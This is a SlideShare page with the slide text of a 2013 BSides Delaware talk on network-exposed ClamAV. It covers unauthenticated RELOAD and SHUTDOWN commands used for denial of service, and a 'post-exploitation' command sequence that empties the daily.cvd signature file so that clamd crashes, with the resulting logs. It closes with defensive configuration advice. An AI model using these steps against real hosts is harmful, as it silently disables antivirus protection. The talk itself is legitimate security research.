SlideShare a Scribd company logo

Baking even more Clam(AV)s for Fun & Profit.

Nathan Gibbs
Nathan Gibbs

Security BSides Delaware BSidesDE 2013 Track 1 November 9th 2013 13:00

Technology
1 of 14
Download to read offline
Baking even more Clam(AV)s for Fun & Profit. ClamAV in a network accessible configuration provides not only remote virus scanning, but also the potential for DOS, etc.
ClamAV-what it is. Open Source Software Provides Virus Scanning Currently owned by Sourcefire Cisco Systems
ClamAV-Component Overview What it does. clamscan cmd line scanner Stand alone freshclam Signature DB update tool clamd Scanning Server Scanning clients clamdscan cmd line scanner clamav-milter email scanning plugin
The Design Problems In Theory Configuration Clamd can bind to an IP address No Access Controls No Authentication No connection logging Malformed DB Handling
The Implementation Problems In Practice Availability of Administrative Commands. VERSION Recon & Information disclosure RELOAD Default Virus DB size is about 74 MB Continuous reloads result in High CPU utilization. SHUTDOWN Guess what that does?:-) A DOS of a networked ClamAV installation. Discussed on ClamAV-user mailing list July 22-23 2011
Bug 2727 Use in Post Exploitation clamconf|grep "DatabaseDirectory" DatabaseDirectory = "/usr/local/share/clamav" DatabaseDirectory = "/usr/local/share/clamav" cd /usr/local/share/clamav ls -lh *.cvd -rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd -rw-r--r-- 1 clamav clamav 12M Nov 4 18:27 daily.cvd -rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd echo -n "" > daily.cvd ls -lh *.cvd -rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd -rw-r--r-- 1 clamav clamav 0 Nov 4 18:41 daily.cvd -rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
Bug 2727 Use in Post Exploitation - Cont.d Nov Nov Nov Nov Nov Nov Nov Nov Nov 4 18:43:50 host clamd[24481]: Reading databases from /usr/local/share/clamav 4 18:43:50 host clamd[24481]: reload db failed: Broken or not a CVD file 4 18:43:50 host clamd[24481]: Terminating because of a fatal error. 4 18:43:50 host clamd[24481]: Waiting for all threads to finish 4 18:43:50 host clamd[24481]: Shutting down the main sockets. 4 18:43:50 host clamd[24481]: Pid file removed. 4 18:43:50 host clamd[24481]: --- Stopped at Mon Nov 4 18:43:50 2013 4 18:43:50 host clamd[24481]: Closing the main sockets. 4 18:43:50 host clamd[24481]: Socket file removed.
Operational Impact clamdscan -m / ERROR: Can't connect to clamd: No such file or directory ----------- SCAN SUMMARY ----------Infected files: 0 Total errors: 1 Time: 0.000 sec (0 m 0 s)
The Defense Configuration Bind to a LOCAL Socket Bind to loopback interface Access Controls - FIREWALL FIX THE BUGS! - Just Saying... :-) Monitoring
Tools - Shameless Plugs Clambake Clambake 0.2 Enumeration "Stress" testing Networked ClamAV DOS capabilities.
Tools - Continued bragging CCEE CCEE 0.97.4 Initially a patch for bug 1754 Adds connection logging to clamd for administrative commands Adds other functionallity to ClamAV Woefully Outdated I am NOT a real c coder. I DO have other things to do. :-)
Tools - Continued Is he done yet? -- Almost. :-) clamd.monitor Monitor plugin for the mon framework Can be used as a stand alone solution Get them all and more at http://www.cmpublishers.com/oss
Contact Info Email: nathan@cmpublishers.com Twitter: @Christ_Media Linkedin: http://www.linkedin.com/in/nategibbs Slideshare: http://www.slideshare.net/NathanGibbs3
Thanks Jesus Christ BSides DE CLAMAV Dev Team, Sourcefire, & Cisco Folks on Clamav-users ML

Recommended

How to monitor NGINX
How to monitor NGINXHow to monitor NGINX
How to monitor NGINXServer Density
 
Nginx internals
Nginx internalsNginx internals
Nginx internalsliqiang xu
 
Maximizing PHP Performance with NGINX
Maximizing PHP Performance with NGINXMaximizing PHP Performance with NGINX
Maximizing PHP Performance with NGINXNGINX, Inc.
 
Nginx, PHP, Apache and Spelix
Nginx, PHP, Apache and SpelixNginx, PHP, Apache and Spelix
Nginx, PHP, Apache and SpelixHarald Zeitlhofer
 
NGINX Can Do That? Test Drive Your Config File!
NGINX Can Do That? Test Drive Your Config File!NGINX Can Do That? Test Drive Your Config File!
NGINX Can Do That? Test Drive Your Config File!Jeff Anderson
 
Keeping DNS server up-and-running with “runit
Keeping DNS server up-and-running with “runitKeeping DNS server up-and-running with “runit
Keeping DNS server up-and-running with “runitMen and Mice
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?Men and Mice
 
HAProxy
HAProxy HAProxy
HAProxy Arindam Nayak
 

Recommended

How to monitor NGINX
How to monitor NGINXHow to monitor NGINX
How to monitor NGINXServer Density
 
Nginx internals
Nginx internalsNginx internals
Nginx internalsliqiang xu
 
Maximizing PHP Performance with NGINX
Maximizing PHP Performance with NGINXMaximizing PHP Performance with NGINX
Maximizing PHP Performance with NGINXNGINX, Inc.
 
Nginx, PHP, Apache and Spelix
Nginx, PHP, Apache and SpelixNginx, PHP, Apache and Spelix
Nginx, PHP, Apache and SpelixHarald Zeitlhofer
 
NGINX Can Do That? Test Drive Your Config File!
NGINX Can Do That? Test Drive Your Config File!NGINX Can Do That? Test Drive Your Config File!
NGINX Can Do That? Test Drive Your Config File!Jeff Anderson
 
Keeping DNS server up-and-running with “runit
Keeping DNS server up-and-running with “runitKeeping DNS server up-and-running with “runit
Keeping DNS server up-and-running with “runitMen and Mice
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?Men and Mice
 
HAProxy
HAProxy HAProxy
HAProxy Arindam Nayak
 
Load Balancing MySQL with HAProxy - Slides
Load Balancing MySQL with HAProxy - SlidesLoad Balancing MySQL with HAProxy - Slides
Load Balancing MySQL with HAProxy - SlidesSeveralnines
 
Banv
BanvBanv
Banvnetvis
 
SRX Automation at Groupon
SRX Automation at GrouponSRX Automation at Groupon
SRX Automation at GrouponAlejandro Salinas
 
Google QUIC
Google QUICGoogle QUIC
Google QUICFelipe Rayel
 
Automating linux network performance testing
Automating linux network performance testingAutomating linux network performance testing
Automating linux network performance testingAntonio Ojea Garcia
 
Naim lighting
Naim lightingNaim lighting
Naim lightingNaim Shafiev
 
NGINX: Basics & Best Practices - EMEA Broadcast
NGINX: Basics & Best Practices - EMEA BroadcastNGINX: Basics & Best Practices - EMEA Broadcast
NGINX: Basics & Best Practices - EMEA BroadcastNGINX, Inc.
 
WebLogic Stability; Detect and Analyse Stuck Threads
WebLogic Stability; Detect and Analyse Stuck ThreadsWebLogic Stability; Detect and Analyse Stuck Threads
WebLogic Stability; Detect and Analyse Stuck ThreadsMaarten Smeets
 
Load Balancing with HAproxy
Load Balancing with HAproxyLoad Balancing with HAproxy
Load Balancing with HAproxyBrendan Jennings
 
Melbourne Infracoders: Compliance as Code with InSpec
Melbourne Infracoders: Compliance as Code with InSpecMelbourne Infracoders: Compliance as Code with InSpec
Melbourne Infracoders: Compliance as Code with InSpecMatt Ray
 
HTTP2:新的机遇与挑战
HTTP2:新的机遇与挑战HTTP2:新的机遇与挑战
HTTP2:新的机遇与挑战Jerry Qu
 
Ripe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigationRipe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigationPavel Odintsov
 
Primer to Browser Netwroking
Primer to Browser NetwrokingPrimer to Browser Netwroking
Primer to Browser NetwrokingShuya Osaki
 
QUIC
QUICQUIC
QUICApache Traffic Server
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
HAProxy 1.9
HAProxy 1.9HAProxy 1.9
HAProxy 1.9HAProxy Technologies
 
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Pavel Odintsov
 
Observability with HAProxy
Observability with HAProxyObservability with HAProxy
Observability with HAProxyHAProxy Technologies
 
Quic illustrated
Quic illustratedQuic illustrated
Quic illustratedAlexander Krizhanovsky
 
BIND 9 logging best practices
BIND 9 logging best practicesBIND 9 logging best practices
BIND 9 logging best practicesMen and Mice
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network IssuesApcera
 
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...Didac Oliveira
 

More Related Content

What's hot

Load Balancing MySQL with HAProxy - Slides
Load Balancing MySQL with HAProxy - SlidesLoad Balancing MySQL with HAProxy - Slides
Load Balancing MySQL with HAProxy - SlidesSeveralnines
 
Automating linux network performance testing
Automating linux network performance testingAutomating linux network performance testing
Automating linux network performance testingAntonio Ojea Garcia
 
NGINX: Basics & Best Practices - EMEA Broadcast
NGINX: Basics & Best Practices - EMEA BroadcastNGINX: Basics & Best Practices - EMEA Broadcast
NGINX: Basics & Best Practices - EMEA BroadcastNGINX, Inc.
 
WebLogic Stability; Detect and Analyse Stuck Threads
WebLogic Stability; Detect and Analyse Stuck ThreadsWebLogic Stability; Detect and Analyse Stuck Threads
WebLogic Stability; Detect and Analyse Stuck ThreadsMaarten Smeets
 
Load Balancing with HAproxy
Load Balancing with HAproxyLoad Balancing with HAproxy
Load Balancing with HAproxyBrendan Jennings
 
Melbourne Infracoders: Compliance as Code with InSpec
Melbourne Infracoders: Compliance as Code with InSpecMelbourne Infracoders: Compliance as Code with InSpec
Melbourne Infracoders: Compliance as Code with InSpecMatt Ray
 
HTTP2:新的机遇与挑战
HTTP2:新的机遇与挑战HTTP2:新的机遇与挑战
HTTP2:新的机遇与挑战Jerry Qu
 
Ripe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigationRipe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigationPavel Odintsov
 
Primer to Browser Netwroking
Primer to Browser NetwrokingPrimer to Browser Netwroking
Primer to Browser NetwrokingShuya Osaki
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Pavel Odintsov
 

What's hot (19)

Load Balancing MySQL with HAProxy - Slides
Load Balancing MySQL with HAProxy - SlidesLoad Balancing MySQL with HAProxy - Slides
Load Balancing MySQL with HAProxy - Slides
 
Banv
BanvBanv
Banv
 
SRX Automation at Groupon
SRX Automation at GrouponSRX Automation at Groupon
SRX Automation at Groupon
 
Google QUIC
Google QUICGoogle QUIC
Google QUIC
 
Automating linux network performance testing
Automating linux network performance testingAutomating linux network performance testing
Automating linux network performance testing
 
Naim lighting
Naim lightingNaim lighting
Naim lighting
 
NGINX: Basics & Best Practices - EMEA Broadcast
NGINX: Basics & Best Practices - EMEA BroadcastNGINX: Basics & Best Practices - EMEA Broadcast
NGINX: Basics & Best Practices - EMEA Broadcast
 
WebLogic Stability; Detect and Analyse Stuck Threads
WebLogic Stability; Detect and Analyse Stuck ThreadsWebLogic Stability; Detect and Analyse Stuck Threads
WebLogic Stability; Detect and Analyse Stuck Threads
 
Load Balancing with HAproxy
Load Balancing with HAproxyLoad Balancing with HAproxy
Load Balancing with HAproxy
 
Melbourne Infracoders: Compliance as Code with InSpec
Melbourne Infracoders: Compliance as Code with InSpecMelbourne Infracoders: Compliance as Code with InSpec
Melbourne Infracoders: Compliance as Code with InSpec
 
HTTP2:新的机遇与挑战
HTTP2:新的机遇与挑战HTTP2:新的机遇与挑战
HTTP2:新的机遇与挑战
 
Ripe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigationRipe71 FastNetMon open source DoS / DDoS mitigation
Ripe71 FastNetMon open source DoS / DDoS mitigation
 
Primer to Browser Netwroking
Primer to Browser NetwrokingPrimer to Browser Netwroking
Primer to Browser Netwroking
 
QUIC
QUICQUIC
QUIC
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
 
HAProxy 1.9
HAProxy 1.9HAProxy 1.9
HAProxy 1.9
 
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
 
Observability with HAProxy
Observability with HAProxyObservability with HAProxy
Observability with HAProxy
 
Quic illustrated
Quic illustratedQuic illustrated
Quic illustrated
 

Similar to Baking even more Clam(AV)s for Fun & Profit.

BIND 9 logging best practices
BIND 9 logging best practicesBIND 9 logging best practices
BIND 9 logging best practicesMen and Mice
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network IssuesApcera
 
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...Didac Oliveira
 
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...NETWAYS
 
Kubernetes Failure Stories - KubeCon Europe Barcelona
Kubernetes Failure Stories - KubeCon Europe BarcelonaKubernetes Failure Stories - KubeCon Europe Barcelona
Kubernetes Failure Stories - KubeCon Europe BarcelonaHenning Jacobs
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
VMworld 2013: VMware Horizon View Troubleshooting: Looking under the Hood
VMworld 2013: VMware Horizon View Troubleshooting: Looking under the HoodVMworld 2013: VMware Horizon View Troubleshooting: Looking under the Hood
VMworld 2013: VMware Horizon View Troubleshooting: Looking under the HoodVMworld
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi Subsystem
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi SubsystemTutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi Subsystem
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi SubsystemDheryta Jaisinghani
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsDr. Ramchandra Mangrulkar
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Computer technicians-quick-reference-guide
Computer technicians-quick-reference-guideComputer technicians-quick-reference-guide
Computer technicians-quick-reference-guideShathees Rao
 
No more ARP : Another MiTm Attacks
No more ARP : Another MiTm AttacksNo more ARP : Another MiTm Attacks
No more ARP : Another MiTm AttacksKhajornchol Puwarang
 
1049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 2016
1049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 20161049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 2016
1049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 2016panagenda
 
Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski
Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski
Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski buildacloud
 
Configuring wifi in open embedded builds
Configuring wifi in open embedded buildsConfiguring wifi in open embedded builds
Configuring wifi in open embedded buildsMender.io
 

Similar to Baking even more Clam(AV)s for Fun & Profit. (20)

BIND 9 logging best practices
BIND 9 logging best practicesBIND 9 logging best practices
BIND 9 logging best practices
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
 
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
FOSDEM'17: Disaster Recovery Management with ReaR (relax-and-recover) & DRLM ...
 
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
 
Kubernetes Failure Stories - KubeCon Europe Barcelona
Kubernetes Failure Stories - KubeCon Europe BarcelonaKubernetes Failure Stories - KubeCon Europe Barcelona
Kubernetes Failure Stories - KubeCon Europe Barcelona
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
VMworld 2013: VMware Horizon View Troubleshooting: Looking under the Hood
VMworld 2013: VMware Horizon View Troubleshooting: Looking under the HoodVMworld 2013: VMware Horizon View Troubleshooting: Looking under the Hood
VMworld 2013: VMware Horizon View Troubleshooting: Looking under the Hood
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi Subsystem
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi SubsystemTutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi Subsystem
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi Subsystem
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Long live to CMAN!
Long live to CMAN!Long live to CMAN!
Long live to CMAN!
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Computer technicians-quick-reference-guide
Computer technicians-quick-reference-guideComputer technicians-quick-reference-guide
Computer technicians-quick-reference-guide
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
No more ARP : Another MiTm Attacks
No more ARP : Another MiTm AttacksNo more ARP : Another MiTm Attacks
No more ARP : Another MiTm Attacks
 
1049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 2016
1049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 20161049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 2016
1049: Best and Worst Practices for Deploying IBM Connections - IBM Connect 2016
 
Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski
Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski
Troubleshooting Strategies for CloudStack Installations by Kirk Kosinski
 
Configuring wifi in open embedded builds
Configuring wifi in open embedded buildsConfiguring wifi in open embedded builds
Configuring wifi in open embedded builds
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 

Recently uploaded

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 

Recently uploaded (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 

Baking even more Clam(AV)s for Fun & Profit.

